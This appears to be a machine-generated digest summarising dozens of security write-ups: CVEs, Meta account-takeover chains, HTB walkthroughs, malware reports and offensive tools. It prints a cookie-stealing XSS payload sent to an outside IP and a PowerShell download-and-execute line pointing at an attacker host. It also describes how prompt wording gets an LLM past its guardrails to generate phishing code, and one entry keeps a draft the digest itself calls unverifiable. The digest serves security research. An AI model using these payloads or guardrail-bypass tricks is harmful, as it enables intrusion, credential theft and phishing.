The post explains Play Integrity’s attestation flow (Play Services collects signals → Google returns a signed+encrypted JWT → backend verifies with Google public key and parses appIntegrity/deviceIntegrity/accountDetails). It then shows a bypass via spoofing: hide root with ReZygisk, use TrickyStore + Tricky Addon (configured via KSU Web UI) to download/replace a “Valid” keybox.xml and spoof Android key attestation so MEETS_BASIC_INTEGRITY + MEETS_DEVICE_INTEGRITY pass, then spoof the security patch date to pass MEETS_STRONG_INTEGRITY. Notes keyboxes can be revoked if overused.

🛠️ Tool | 🌐 Web | 💰 Bug Bounty | 🧩 LLM

🔗 Original article: https://pentestbook.six2dez.com/others/burp

Connect Burp Suite MCP Server (BApp) to Codex CLI using an extracted stdio “server proxy jar” so the LLM can reason over real intercepted HTTP traffic (no API keys, no scanning/fuzzing). Burp MCP may fail handshake due to strict Origin validation and extra headers; the workaround is placing a local Caddy reverse proxy in front. Includes a concrete User-Agent rewrite regex and a curated list of Burp extensions for testing (Param Miner, HTTP Request Smuggler, Turbo Intruder, etc.).

🛡️ CVE | 💣 RCE | 🐍 Python | 🛠️ Tool

🔗 Original article: https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/

Unit 42 found high-severity RCE in NeMo (CVE-2025-23304) and uni2TS (CVE-2026-22584), plus similar issues in ml-flextok. Root cause: passing untrusted model metadata/config into Hydra’s hydra.utils.instantiate(), which can invoke arbitrary callables (PoCs use builtins.exec() with a Python string). Attackers embed malicious _target_ payloads in NeMo model_config.yaml, HuggingFace config.json, or safetensors __metadata__. Fixes: NeMo 2.3.2; uni2TS July 31, 2025; ml-flextok June 2025.

🛠️ Tool | 🌐 Web | 🤖 AI | 🧰 Burp

🔗 Original article: https://github.com/six2dez/burp-mcp-agents

This repo is a tooling/workflow kit to connect Burp Suite MCP Server (listening on 127.0.0.1:9876) through a Caddy reverse proxy (MCP SSE) to AI backends (Codex CLI, Gemini CLI, or local Ollama). It ships reusable prompts for passive analysis of real Burp traffic (IDOR/BOLA, auth mapping, SSRF/redirect candidates, logic flaws, token scope issues, rate limits) plus shell launchers (burpcodex, burpgemini, burpollama <model>) that auto-start/stop Caddy.

🛡️ CVE | 🌐 Web | 🧠 Memory Leak

🔗 Original article: https://unit42.paloaltonetworks.com/mongobleed-cve-2025-14847/

MongoBleed (CVE-2025-14847, CVSS 8.7) is a critical pre-auth MongoDB Server heap memory disclosure reachable over TCP/27017 via zlib-compressed OP_COMPRESSED messages. Attackers inflate the OP_COMPRESSED uncompressedSize to force oversized buffers containing uninitialized heap data, then amplify leakage using malformed BSON missing a null terminator so parsing scans until null; error responses return the malicious message plus leaked heap memory. Active exploitation is confirmed; mitigations include blocking 27017 and disabling zlib. Includes an XQL hunting query.

📡 WiFi | 🛠️ Tool | ⛓️ MitM | 🎁 PoC

🔗 Original article: https://www.synacktiv.com/en/publications/wireless-infidelity-pentesting-wi-fi-in-2025.html

Synacktiv’s 2025 Wi‑Fi pentest writeup explains how Open/OWE, WEP, WPA2‑PSK and WPA2/3‑Enterprise work and how they’re broken in practice. It shows monitor‑mode sniffing, Responder LLMNR/mDNS poisoning on open Wi‑Fi, deterministic WEP cracking with aircrack‑ng (airodump/aireplay PTW), WPA2‑PSK handshake/PMKID offline attacks, and a 🎁 PoC for optimized online PSK guessing via patched wpa_supplicant + control socket. For enterprise Wi‑Fi, it details Evil Twin credential theft (EAPHammer/Bettercap), NetNTLMv2 cracking with john, GTC cleartext capture, and PEAP‑MSCHAPv2 relay with hostapd‑mana + wpa_sycophant.

Web | XSS | CVE | PoC

🔗 Original article: https://ysamm.com/uncategorized/2025/01/13/capig-xss.html

Meta CAPIG’s shared script capig-events.js had two major issues: (1) a DOM-based bug where an unvalidated postMessage event.origin is stored and later used to load <origin>/sdk/<pixel_id>/iwl.js, enabling JS execution when CSP/COOP conditions allow; (2) a backend stored JS injection in AHPixelIWLParametersPlugin.java where user-controlled values are concatenated into JS appended to capig-events.js, enabling supply-chain stored XSS at scale.

🛡️ CVE | 💣 RCE | 📱 Mobile | 🌐 0-click

🔗 Original article: https://projectzero.google/2026/01/pixel-0-click-part-1.html

Project Zero shows how Google Messages’ auto-decoding of SMS/RCS audio creates a 0-click attack surface. Part 1 exploits CVE-2025-54957 in the Dolby Unified Decoder (Pixel 9: /vendor/lib64/libcodec2_soft_ddpdec.so): a crafted EMDF payload uses unbounded variable_bits() to set a huge payload_length, triggering a 64-bit wrap in evo_malloc’s 8-byte alignment logic, allocating too-small memory and causing a controlled heap overflow. emdf_container_length bounds the number of bytes copied, making the overflow practical. Fixed Jan 5, 2026.

📱 Mobile | 🐧 Kernel | 🧨 UAF | 🧬 Sandbox Escape

🔗 Original article: https://projectzero.google/2026/01/pixel-0-click-part-2.html

Project Zero maps kernel driver attack surface reachable from Android’s sandboxed mediacodec context using DriverCartographer and finds /dev/bigwave (Pixel BigWave AV1 accelerator) accessible. A race in BIGO_IOCX_PROCESS (16s wait_for_completion_timeout) allows closing the FD after timeout while bigo_worker_thread still uses the inline job inside struct bigo_inst, causing a UAF. By reclaiming freed memory with kmalloc sprays (e.g., Unix domain socket messages), attackers control job->regs, turning memcpy_fromio(regs, core->base, core->regs_size) into a 2144-byte arbitrary kernel write (no KASLR leak). Fixed Jan 5, 2026.

🌐 Web | 🔓 IDOR | 🕵️ OSINT | 🛠️ Tool

🔗 Original article: https://www.pentestpartners.com/security-blog/carlsberg-probably-not-the-best-cybersecurity-in-the-world/

Carlsberg’s “memories” page used only a low-entropy wristband ID from a QR URL to fetch visitor media via a Google cloudfunctions.net backend. The front-end merely hex-encodes the ID (e.g., C-285-100 → 43 2d 32 38 35 2d 31 30 30). Using Burp Intruder, the author brute-forced 1,000,000 IDs in ~2 hours, found ~500 valid, and estimated full enumeration (~26M space) in ~52 hours, exposing photos/videos plus full names (PII). CVSS 7.5 High; rate-limiting claim didn’t stop brute force.

⛓️ Supply Chain | ☁️ Cloud | 💥 RCE | 🎁 PoC

🔗 Original article: https://www.wiz.io/blog/wiz-research-codebreach-vulnerability-aws-codebuild

Wiz “CodeBreach” shows how an unanchored regex in AWS CodeBuild’s GitHub ACTOR_ID webhook filter let attacker IDs match by substring, enabling untrusted PRs to trigger privileged builds. Wiz raced to register “eclipsing” sequential GitHub numeric IDs using the GitHub App manifest flow (burst bot creation), then used a PR with a malicious NPM dependency to dump build-process memory and steal a GitHub Classic PAT. The token (repo/admin:repo_hook) enabled collaborator/admin escalation and full repo takeover with supply-chain impact.

🌐 Web | 🔁 Redirect | 🎟️ Token | 🚪 Account Takeover

🔗 Original article: https://ysamm.com/uncategorized/2026/01/16/leaking-fxauth-token.html

FXAuth redirects include signed token + blob. Although Meta restricted base_uri to Meta-owned domains, attackers could still exfiltrate tokens by choosing a Meta domain with attacker-controlled execution (e.g., apps.facebook.com/{app_namespace}). A victim approves a crafted https://auth.meta.com/fxauth/ URL, gets redirected with token/blob, and attacker code reads them from the URL. Replaying blob+token against Accounts Center endpoints enables account linking and reauth bypass, potentially leading to takeover. Fixed Jan 15, 2026.

🌐 Web | 🕵️ XS-Leak | 🎁 PoC | 🧬 Fingerprinting

🔗 Original article: https://ysamm.com/uncategorized/2026/01/16/cross-site-leaks.html

Blog post compiling multiple XS-Leaks on Meta properties enabling user identification and de-anonymization. Includes: (1) Workplace Zoom callback oracle via Content-Type differences (text/html vs application/json) observable via script onload/onerror and CORB; (2) Facebook plugin iframe oracle where correct __user triggers postMessage but incorrect returns X-Frame-Options: deny (PoC included); (3) direct Facebook userID extraction from /signals/iwl.js using Function.prototype manipulation (PoC included); (4) employee/login-state fingerprinting via Meta subdomain probing.

🌐 Web | 💉 XSS | 🔁 postMessage | 🎁 PoC

🔗 Original article: https://ysamm.com/uncategorized/2026/01/15/self-xss-facebook-payments.html

Facebook’s ACH billing page embeds a trusted payment-provider iframe and accepts postMessage only from that origin. A permitted message type (ThirdPartyPaymentProvider.learnMore) injects unsanitized HTML into the Facebook DOM. By first XSS’ing the provider (using a remote-config URL parameter) and turning it into a postMessage eval relay, an attacker can trigger XSS on facebook.com, steal Instagram OAuth codes, and (per the PoC) potentially take over Facebook accounts via device-based “Save Login” GraphQL + replay.

🌐 Web | 💣 ATO | 🛡️ OAuth | 🎁 PoC

🔗 Original article: https://ysamm.com/uncategorized/2026/01/15/steal-dtsg-cookie.html

A Meta/Facebook bug allegedly leaked the long-lived trusted-device cookie datr by returning it as machine_id during an OAuth code exchange. Using Graph API batch request chaining ({result=test:$.machine_id}), the attacker could exfiltrate the value into an attacker-controlled sink (e.g., a Page post) via a victim visit in an invisible iframe. Replaying datr made the attacker appear as a trusted device, enabling account recovery via automated document verification and adding a new email—bypassing password and 2FA.

🌐 Web | 💣 ATO | 🔁 postMessage | 🎁 PoC

🔗 Original article: https://ysamm.com/uncategorized/2026/01/16/leaking-fbevents-ato.html

Meta Pixel (fbevents.js) registers a postMessage listener when a page has an opener and trusts messages mainly by origin (facebook.com). A misconfigured facebook.com/REDACTED endpoint can relay attacker-controlled messages (incl. an attacker Graph Explorer access_token) to a developers.facebook.com OAuth page. fbevents.js then calls graph.facebook.com embedding location.href/referrer, leaking victim OAuth codes via Graph Explorer history. The stolen Instagram code can be redeemed for a first‑party IG token via developers.facebook.com/instagram/short_lived_access_token/oauth/, enabling ATO. PoC included.

💉 XSS | 🌐 Web | 🧩 Supply Chain | 💰 Bug Bounty

🔗 Original article: https://ysamm.com/uncategorized/2026/01/13/capig-xss.html

Meta’s CAPIG shared script (capig-events.js) had two XSS-class issues. Bug #1: a postMessage handler stores unvalidated event.origin and later loads <origin>/sdk/<pixel_id>/iwl.js, enabling XSS when CSP/COOP constraints are bypassed (WebView window.name trick + iframe hijack + CSP-allowed third-party origins). Bug #2: backend concatenates user-controlled values into executable JS appended to capig-events.js, enabling stored JS injection → supply-chain stored XSS at massive scale.

🌐 Web | 🧩 OAuth/SSO | 💥 ATO | 🎁 PoC

🔗 Original article: https://ysamm.com/uncategorized/2026/01/15/steal-fxauth-leads-instagram-ato.html

A Meta Accounts Center ATO chain: bypass Facebook /login/native_sso/ redirect validation for Instagram app_id=1217981644879628 using double-encoded traversal in extra_data to reach IG billing_interfaces/external_result. With a valid attacker-generated nonce (GraphQL doc_id=8354858754606667) and forcing victim into attacker IG via /_n/web_emaillogin login CSRF, the endpoint postMessage('*') leaks the full redirect URL (victim blob+token) to the attacker’s opener. Attacker completes linking at accountscenter.instagram.com/add/?blob=...&token=...&auth_flow=linking, gaining persistent FB control without password/2FA.

🛡️ CVE | 📡 IoT | 🔵 Bluetooth | 🕵️ Privacy

🔗 Original article: https://whisperpair.eu/

WhisperPair (CVE-2025-36911, critical) targets Google Fast Pair audio accessories that fail to ignore Fast Pair initiation unless in pairing mode. Attackers nearby (tested up to 14m) can force Fast Pair initiation and then complete normal Bluetooth pairing in ~10s, gaining control (loud audio, mic eavesdropping). If a Find Hub-capable accessory was never paired with Android, an attacker can write the first Account Key (Owner Account Key) and add it to Find Hub for crowdsourced location tracking. Only accessory firmware updates fix it.

🌐 Web | 💉 XSS | 🧩 SSTI | 💣 RCE

🔗 Original article: https://0xdf.gitlab.io/2026/01/17/htb-hacknet.html

HTB HackNet (Django): a quote in the username breaks out of an <img title="..."> attribute on the likes page, revealing an SSTI sink. Django SSTI payloads like {{ request }} execute, and {{ users }} exposes a QuerySet of SocialUser objects. Using {{ users.values }} dumps full user records including plaintext passwords, which are parsed into users.txt via grep/sed. A provided Python requests.Session() + CSRF automation script (run with uv) sets the username payload and extracts results from title="..." attributes. Later chain mentions FileBasedCache+pickle RCE and GPG backup decryption to root.

🌐 Web | 🧬 SSRF | ☁️ AWS | 💣 RCE

🔗 Original article: https://estse.github.io/posts/compromising-a-nasdaq-financial-giant/

A profile-image crop endpoint (POST /profile/crop-image) fetched a user-controlled path URL server-side, creating an SSRF sink. By setting path=//google.com, the app stored the fetched HTTP response body as a “cropped image” in S3 (confirmed with wget + cat). Direct AWS IMDS access to 169.254.169.254 was filtered, but bypassed using the decimal IP 2852039166 to retrieve /latest/meta-data/iam/security-credentials/farm. The stolen IAM creds allowed listing thousands of EC2 instances and running commands as root (critical/P1).

🛡️ CVE | 📡 IoT | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://github.com/zalexdev/wpair-app

WPair is an Android/Kotlin research tool for CVE-2025-36911 (“WhisperPair”) in Google Fast Pair. It scans BLE Fast Pair devices advertising UUID 0xFE2C, runs a non-invasive test by attempting Key-Based Pairing without a signature, and (for authorized testing) demonstrates an exploit chain: Key-Based Pairing bypass → BR/EDR address extraction → Bluetooth Classic bonding via createBond(BR/EDR) → HFP/SCO connection to access microphone audio (live + M4A recording).

💉 XSS | 🌐 Web | ⛓️ Exploit Chain | 🎁 PoC

🔗 Original article: https://ysamm.com/uncategorized/2026/01/17/math-random-facebook-sdk.html

Meta bug-bounty chain: Facebook JS SDK Customer Chat handles xd.mpn.setupIconIframe and injects attacker-controlled iconSVG via sdk.DOM.html() → DOM XSS. Although SDK validates postMessage by origin + random callback, the callback is guid() built from Math.random(). The attacker leaks PRNG outputs via plugin iframe window.name, forces repeated iframe recreation via init:post → XFBML.parse(), predicts V8 Math.random with a Z3-based solver, and uses plugins/feedback.php injection to send trusted-origin messages. In Facebook app webview + Compat framing, XSS on www.facebook.com can steal OAuth tokens → ATO.

🛠️ Tool | 📱 Mobile | 🧩 Frida | 🔐 DRM

🔗 Original article: https://github.com/lautarovculic/frida-ipa-extract

frida-ipa-extract is a Python 3.9+ Frida tool that dumps decrypted iOS apps as a .ipa from a jailbroken device. It supports USB (-U) or SSH (paramiko) with SFTP and a tunnel to frida-server:27042, optional sandbox dumping, spawn/attach modes, and retry logic if Frida disconnects. Troubleshooting covers “Frida attach timed out”, “script has been destroyed”, and “No running apps found”.

🛡️ CVE | 💣 RCE | 🪟 Windows | 🎁 PoC

🔗 Original article: https://swarm.ptsecurity.com/whos-on-the-line-exploiting-rce-in-windows-telephony-service/

CVE-2026-20931 (patched Jan 13, 2026): In Windows TAPI server mode, the Telephony service (TapiSrv) uses pull-mode async events by opening a client “mailslot” path with CreateFileW(…, OPEN_EXISTING) but does not validate it’s a mailslot. A remote authenticated client can provide an arbitrary existing file path writable by NETWORK SERVICE and then force events to write attacker-chosen InitContext DWORDs into that file. By writing to C:\Windows\TAPI\tsec.ini to add themselves as TapiAdministrators, the attacker gains Telephony admin and triggers RCE via GetUIDllName (admin-only LoadLibrary + TSPI_providerUIIdentify).

🛡️ CVE | 💣 RCE | 🪟 Windows | 🎁 PoC

🔗 Original article: https://habr.com/ru/companies/pt/articles/984934/

CVE-2026-20931: Windows Server TapiSrv (Telephony) RCE in server mode. In MS-TRP pull async events, user-controlled pszDomainUser is passed to CreateFileW(..., GENERIC_WRITE, OPEN_EXISTING) without enforcing a \\*\MAILSLOT\ path, letting attackers open any existing file writable by NETWORK SERVICE and write controlled 4-byte chunks (the app InitContext). By overwriting C:\Windows\TAPI\tsec.ini to add themselves under [TapiAdministrators], attackers gain telephony admin flags and can abuse GetUIDllName to LoadLibrary a DLL and execute TSPI_providerUIIdentify (PoC runs whoami /all).

🛠️ Tool | 🌐 Web | 🧪 Fuzzing | 🕵️ Recon

🔗 Original article: https://trustedsec.com/blog/colonel-clustered-finding-outliers-in-burp-intruder

Colonel Clustered is an open-source Burp Suite extension that clusters Intruder results by response content to reveal subtle outliers invisible to sorting by size/status/time. It tokenizes responses by content-type, pre-groups for speed, then clusters using a fast DBSCAN-based mode by default plus an optional “Deep Analysis” similarity-matrix mode (more accurate but slow—don’t use on ~10k requests). Workflow: run Intruder → select all → “Send to Colonel Clustered” → review clusters in the “Col. Clustered” tab → diff outliers with Burp Comparer. Repo: https://github.com/hoodoer/ColonelClustered

🛡️ Azure | 🌐 DNS | 💥 DoS | ☁️ Cloud

🔗 Original article: https://unit42.paloaltonetworks.com/dos-attacks-and-azure-private-endpoint/

Unit 42 describes a DNS-based DoS risk in Azure Private Link/Private Endpoints (not a CVE). If a VNET is linked to a service-type Private DNS zone (e.g., privatelink.blob.core.windows.net), Azure can force DNS resolution through that zone; if the needed A record is missing, clients can’t resolve the hostname and lose access—even if the public endpoint still works. Attackers with Azure RBAC can abuse Private Endpoints/DNS links to trigger outages. Includes Resource Graph queries and mitigations (DNS fallback, manual records).

🛡️ CVE | 🌐 Web | 🧪 SSRF | 💥 DoS

🔗 Original article: https://www.tenable.com/blog/tenable-discovers-ssrf-vulnerability-in-java-tls-handshakes-that-creates-dos-risk

Java mTLS servers can be tricked into SSRF/DoS during TLS client-cert validation when AIA CA Issuers fetching is enabled (-Dcom.sun.security.enableAIAcaIssuers=true). CVE-2026-21945 (fixed in Oracle Jan 2026 CPU) lets an attacker embed a CA Issuers URI in a client cert; Java then dereferences it during certpath building. PoC shows outbound GETs to http://localhost:8080 (captured via nc -l 8080 -k) and a DoS by pointing CA Issuers to file:///dev/urandom, pinning CPU and blocking new requests.

🛡️ CVE | 💣 RCE | 🌐 Web | 🎁 PoC

🔗 Original article: https://github.com/zeroxjf/WebKit-UAF-ANGLE-OOB-Analysis

Notes + 🎁 PoC probe repo for an iOS 26.1 Safari chain: CVE-2025-43529 (JSC DFG missing write barrier → GC UAF) enables butterfly reclaim and boxed/unboxed type confusion to build addrof/fakeobj; arbitrary read/write is still unverified on arm64e due to PAC (TypedArray m_vector / JSArray butterfly). Also documents CVE-2025-14174 (ANGLE Metal PBO staging buffer sized by UNPACK_IMAGE_HEIGHT) with a WebGL2 texImage2D OOB-write trigger.

🌐 Web | 🧠 AI/LLM | 🛠️ Tool | 💰 Phishing

🔗 Original article: https://unit42.paloaltonetworks.com/real-time-malicious-javascript-through-llms/

Unit 42 (Jan 22, 2026) demonstrates an “LLM-augmented runtime assembly” phishing PoC: a benign-looking page calls a trusted LLM chat API from the victim browser, receives JavaScript snippets, then assembles/executes them at runtime (e.g., via eval) to render a LogoKit-style credential-harvesting phishing page. Prompt engineering (e.g., requesting a generic $AJAX POST helper instead of “exfiltrate credentials”) can bypass guardrails; non-deterministic LLM output yields polymorphic code per visit. Defense centers on in-browser runtime behavioral analysis and browser-based sandboxes/crawlers.

A technical problem

🧩 AD | 🛡️ Technique | 🕵️ Evasion | 🧰 Tool

🔗 Original article: https://trustedsec.com/blog/adventures-in-primary-group-behavior-reporting-and-exploitation

AD group membership is derived from both the group’s member list and users whose primaryGroupID points to the group. TrustedSec shows that setting primaryGroupID=512 (Domain Admins) via DCShadow (mimikatz) works, but changing PGID also strips the old primary group membership (e.g., Domain Users), and DSInternals Set-ADDBPrimaryGroup behaves the same. The real risk is inconsistent reporting: Get-ADGroup/memberOf/ADSI can miss primary-group members, while Get-ADGroupMember, net group, ADUC/Admin Center show them; recursive/nested queries can also miss them.

🪟 Windows | 🎣 Phishing | 🛡️ Malware | ⬆️ Privesc

🔗 Original article: https://research.checkpoint.com/2026/konni-targets-developers-with-ai-malware/

KONNI targets blockchain/crypto-focused developers with a ZIP (PDF + malicious LNK). The LNK runs an embedded PowerShell loader that drops XOR-encoded DOCX/CAB; a BAT stages components under C:\ProgramData and persists via schtasks hourly, XOR-decrypting a PS backdoor with key Q and executing via iex. The backdoor does anti-analysis + click checks, uses mutex Global\SysInfoProject_<UUID> (UUID f7d77a6d-36e0-4fcb-bae7-5f4b3b723f61), fingerprints via WMI+SHA-256, bypasses an AES/JS cookie gate (__test), elevates via fodhelper.exe, disables UAC prompts, adds Defender exclusions, and can deploy SimpleHelp RMM.

🪟 Windows | 🧰 LOLBAS | 🦠 Malware | 🖥️ RAT

🔗 Original article: https://redcanary.com/blog/threat-intelligence/intelligence-insights-january-2026/

Red Canary’s January 2026 Intelligence Insights details Scarlet Goldfinch delivering Remcos using paste-and-run + LOLBAS. A key chain uses hidden PowerShell to run finger user@host | cmd (TCP/79) so attacker-controlled server output becomes executable commands. Later stages use curl to download an archive disguised as .pdf, tar -xf to extract, then launch a legitimate EXE (via Invoke-CimMethod Win32_Process Create) to DLL-sideload a malicious Remcos DLL. It also provides a forfiles flag-based hunt analytic. No CVEs.

🛠️ Tool | 📱 Android | 🐉 Kali | 🧩 Chroot

🔗 Original article: https://medium.com/@JanCSG/samsung-s23-ultra-the-ultimate-nethunter-setup-31c1105201d9

The supplied “blog content” is only a JS/cookie gate, so the article body can’t be verified. Preserving the provided draft: it’s a rooted Samsung S23 Ultra (Android 14) Kali “NetHunter-like” setup using a native chroot (not PRoot) plus a launcher script that mounts dev/proc/sys/devpts (fixing Ctrl+C/job control), bind-mounts storage and optionally Android / into /android, maps aid_inet GID 3003 to fix socket permission errors, sets DNS, and uses trap-based unmount cleanup.

🛡️ CVE | 💣 RCE | 🧠 Heap | 🎁 PoC

🔗 Original article: https://www.synacktiv.com/en/publications/on-the-clock-escaping-vmware-workstation-at-pwn2own-berlin-2025.html

Synacktiv explains a VMware Workstation VM escape (CVE-2025-41238) exploited at Pwn2Own Berlin 2025. A fixed 0x4000 realloc in PVSCSI causes 16-byte-stride OOB writes past 1024 S/G entries, with a forced zero dword. They defeat Windows 11 LFH using a deterministic “Ping-Pong” heap state, a UHCI URB FIFO “reap oracle” to map adjacency, and PVSCSI coalescing/compaction to fully rewrite URBs and craft a hybrid URB infoleak. Leaked pointers enable stable arbitrary read/write and a CFG-aware call to WinExec in vmware-vmx.

🛠️ Tool | 🧩 SCCM | 📡 PXE | 🎁 PoC

🔗 Original article: https://github.com/leftp/SharpPXE

SharpPXE is a C# tool that emulates a PXE client against SCCM PXE servers. It sends a PXE request to UDP/4011, parses the response for boot artifact paths (e.g., variables.dat, boot.bcd) and sometimes a decryption key, downloads variables.dat via TFTP, then either decrypts it to XML (extracting MP URL, site code, media GUIDs) or outputs a Hashcat-ready $sccm$aes128$ hash for offline password cracking. No CVE is cited.

💉 XSS | 📁 LFI | 🛡️ Web | 🧪 HTB

🔗 Original article: https://0xdf.gitlab.io/2026/01/24/htb-imagery.html

Imagery (Flask/Werkzeug 3.1.3) is compromised by a stored XSS in the admin bug-report viewer: report.details is inserted into innerHTML without DOMPurify. Because SESSION_COOKIE_HTTPONLY=False, the payload <img src=x onerror=fetch('http://10.10.15.179/?c='+document.cookie)> steals the admin’s Flask session cookie. With admin access, /admin/get_system_log?log_identifier=... is directory-traversable, enabling arbitrary file read (/etc/passwd, /proc/self/environ) and bulk source download using curl --path-as-is --ignore-content-length.

🌐 Web | 🧩 Browser | 🪟 UI Redress | 🎁 PoC

🔗 Original article: https://phor3nsic.github.io/2026/01/21/trick-iframe-sandbox.html

A sandboxed iframe with sandbox="allow-scripts" (no allow-popups) can still trigger a browser Basic Auth modal. If you can control the iframe navigation, load a URL that returns 401 Unauthorized with WWW-Authenticate (e.g., https://httpbin.org/basic-auth/user/pass) and the browser displays the credential prompt anyway. This enables UI redressing/phishing-style flows and may interact with password managers. No CVE; treated as intended.

🛡️ CVE | 💣 RCE | 🪟 Windows | 🎁 PoC

🔗 Original article: https://0xdf.gitlab.io/2026/01/26/htb-job.html

HTB Job (Windows Server 2022): enumerate SMTP/IIS, then get RCE by emailing a LibreOffice .odt with an auto-run Basic macro (sent via swaks with --attach @resume.odt). As jack.black, discover JOB\developers has full control of C:\inetpub\wwwroot; drop an ASPX cmd webshell to execute as iis apppool\defaultapppool. With SeImpersonatePrivilege, run GodPotato-NET4 (V1.20) to spawn a SYSTEM reverse shell and read root.txt.

🪟 Windows | ⬆️ EoP | 🛡️ UAC | 🧠 Logic Bug

🔗 Original article: https://projectzero.google/2026/26/windows-administrator-protection.html

Administrator Protection (Windows 11 25H2) replaces classic UAC using a shadow admin account and removing auto-elevation. Project Zero shows a silent bypass: race a shadow-admin process started via RAiProcessRunOnce, duplicate its token to an identification token, open ?? to trigger lazy creation of \Sessions\0\DosDevices<LUID> via SeGetTokenDeviceMap/ZwCreateDirectoryObject, then plant a C: symlink to hijack drive resolution and redirect DLL loads for admin code execution. Fixed in KB5067036.

🛠️ Tool | 🌐 Web | 🔑 OAuth | ☁️ Cloud

🔗 Original article: https://github.com/zh54321/SharePointDumper

SharePointDumper is a PowerShell extraction/auditing tool that takes an existing Microsoft Graph OAuth2 delegated token (Sites.Read.All or Sites.ReadWrite.All), enumerates SharePoint sites/drives/files via Graph, then recursively downloads files via SharePoint pre-auth URLs. It produces detailed reports and full Graph+SharePoint HTTP request logs (CSV/JSON), supports UA/proxy/throttling+jitter, size/file limits, site/extension filters, resume mode, and optional token refresh via EntraTokenAid.

🌐 Web | 🛡️ CVE | 💣 RCE | 🎁 PoC

🔗 Original article: https://grahamhelton.com/blog/nodes-proxy-rce

Kubernetes v1.34–v1.35: a service account with only nodes/proxy + get can exec commands in arbitrary Pods if it can reach the Kubelet API on https://$NODE_IP:10250. Because WebSocket exec starts with an HTTP GET handshake, kubelet auth maps it to RBAC get and (due to default path mapping) authorizes it as nodes/proxy, bypassing the expected create check. Exploit with websocat and v4.channel.k8s.io. Direct kubelet exec isn’t logged as pods/exec by AuditPolicy.

🌐 Web | 💣 RCE | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://0xdf.gitlab.io/2026/01/27/htb-jobtwo.html

Walkthrough of the Windows HTB/VulnLab machine “JobTwo”. Recon finds hMailServer SMTP, IIS, WinRM, RDP, and SSH. Initial access is gained by emailing a Word resume containing an AutoOpen VBA macro that runs: powershell -ep bypass -c "iex(iwr http://ATTACKER/shell.ps1 -usebasicparsing)" via swaks --attach @resume.doc, then catching a reverse shell as job2\julian with rlwrap nc. The author then describes decrypting hMailServer DB creds (known Blowfish key), dumping/cracking hashes to pivot via WinRM, and finally getting SYSTEM via Veeam CVE-2023-27532.

☁️ Cloud | 🎣 Phishing | 🧩 IAM | ✉️ Email Abuse

🔗 Original article: https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns

Rapid7 reports an AWS account abuse incident where attackers validated leaked long-term AWS keys (sts:GetCallerIdentity; UA “TruffleHog Firefox”), pivoted to a higher-privileged IAM user, and confirmed permissions by triggering “safe” API errors (EntityAlreadyExistsException, PasswordPolicyViolationException). After creating an admin IAM user (AdministratorAccess), they found SES unusable due to sandbox limits (verified-only, 200/day, 1 msg/s) and requested 100,000/day via servicequotas. They then bypassed SES friction by creating WorkMail orgs, verifying domains via SES APIs invoked by workmail.amazonaws.com, and sending mail with major logging gaps (web: ses:SendRawEmail with sourceIPAddress=workmail.*; SMTP: no CloudTrail).

🛠️ Tool | 📱 Android | 🔬 RE | 🧠 Memory

🔗 Original article: https://github.com/TheQmaks/soSaver

soSaver is a Frida-based Android RE tool that dumps native ELF .so libraries from a running app’s memory when filesystem/APK extraction fails (e.g., runtime decryption, packing, dynamic loading/generation). It hooks dlopen/android_dlopen_ext, scans memory for ELF headers (including periodic scans), reads module bytes in blocks, sends them to a Python host via Frida messages, and writes them to disk with a filesystem fallback. Includes uv-based install and CLI usage examples.

📱 Mobile | 🕵️ Spyware | 🪟 Windows | 🎭 Social Engineering

🔗 Original article: https://www.welivesecurity.com/en/eset-research/love-actually-fake-dating-app-used-lure-targeted-spyware-campaign-pakistan/

ESET analyzes a Pakistan-targeted espionage campaign centered on an Android spyware app (GhostChat, Android/Spy.GhostChat.A) distributed via sideloading. The app uses hardcoded login (chat/12345) and hardcoded per-profile unlock codes tied to embedded +92 WhatsApp numbers to lure victims while it exfiltrates device ID, contacts (.txt from cache), and documents/images; it also monitors new images and scans for new documents every 5 minutes, persisting via BOOT_COMPLETED and foreground services. Related Windows activity includes batch scripts that download a DLL and run it via rundll32, and a ClickFix chain delivering file.dll that polls hitpak[.]org and executes base64 PowerShell commands (ExecutionPolicy Bypass, hidden window).

📱 Android | 🧠 Malware | 📡 NFC | 🛰️ C2

🔗 Original article: https://www.d3lab.net/nfcshare-android-trojan-nfc-card-data-theft-via-malicious-apk/

NFCShare (Jan 29, 2026) is an Android trojan delivered as a fake Deutsche Bank “update” APK (deutsche.apk) labeled “Support Nexi”. It uses android.nfc.tech.IsoDep (ISO‑DEP/ISO 14443‑4) to read card data, serializes it as number && type && label && MM/yy, and collects a 4/6-digit PIN via a local HTML/JS WebView flow. Data is exfiltrated as JSON over WebSocket (decoded: ws://38[.]47[.]213[.]197:7068/). Strings are XOR-obfuscated with NPStringFog (KEY="itnewpag").

🌐 Web | 🛠️ Tool | 🧩 AD | 🔁 NTLM Relay

🔗 Original article: https://0xdf.gitlab.io/2026/01/29/barbhack-2025-ctf.html

Barbhack 2025 “Pirates” AD lab writeup: discover 4 Windows Server 2022 hosts with NetExec/nmap, find printer UI on JOLLYROGER:8080 leaking the admin password in raw HTML (admin:hplaserbarbhack), use HTTP Basic auth to browse /scan and download IT_Procedures.docx (plaintext) containing 52 onboarding creds. Extract aligned username/password lists and validate pairs with netexec smb ... --no-bruteforce, yielding 3 working domain logins. Notes SMB/LDAP signing posture enabling later relay/RBCD chaining.

🧩 Active Directory | 🛡️ Hardening | 🛡️ CVE | 🌐 LDAP

🔗 Original article: https://trustedsec.com/blog/ldap-channel-binding-and-ldap-signing

TrustedSec details how LDAP Channel Binding (CBT over LDAPS) and LDAP Signing harden AD against MitM/relay/replay. It covers Server 2025’s new “LDAP server signing requirements Enforcement” defaulting to Require Signing, explains CBT/Extended Protection (CVE-2017-8563), and provides an audit-first rollout: enable NTDS LDAP Interface Events logging (Reg Add ... /d 2), set CBT to “When Supported,” and monitor DC events 2889, 3074, 3075 before enforcing “Always”/“Require signing.”

📱 Mobile | 🧠 Malware | 🌐 C2 | 🛠️ TTPs

🔗 Original article: https://www.bitdefender.com/en-us/blog/labs/android-trojan-campaign-hugging-face-hosting-rat-payload

